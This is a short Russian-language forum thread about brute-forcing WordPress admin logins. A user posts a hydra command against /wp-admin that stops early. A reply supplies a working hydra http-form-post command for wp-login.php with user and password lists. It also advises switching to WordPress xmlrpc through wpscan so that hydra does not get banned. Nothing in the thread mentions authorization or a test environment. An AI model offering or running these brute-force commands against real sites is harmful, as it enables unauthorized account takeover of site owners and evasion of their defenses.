Привет всем , собственно стартуем с такой команды "hydra -l admin -x 4:8:0123456789 -s 443 -f ( domain host) https-get /wp-admin"и старт заканчивается на первых цифрах .говорит что пароль найден , но он не верен , по всей видимости он сам останавливается по каким-то причинам . Пробовал также ставить количество задач и тайм опциями -t -w но не помогало . подскажите как начать нормально брутить
В гугле полно ответов по поводу брута wp, вот один из примеров: hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Но гидра быстро получит бан, используй wp xmlrpc для брута, он есть в "wpscan" https://github.com/wpscanteam/wpscan
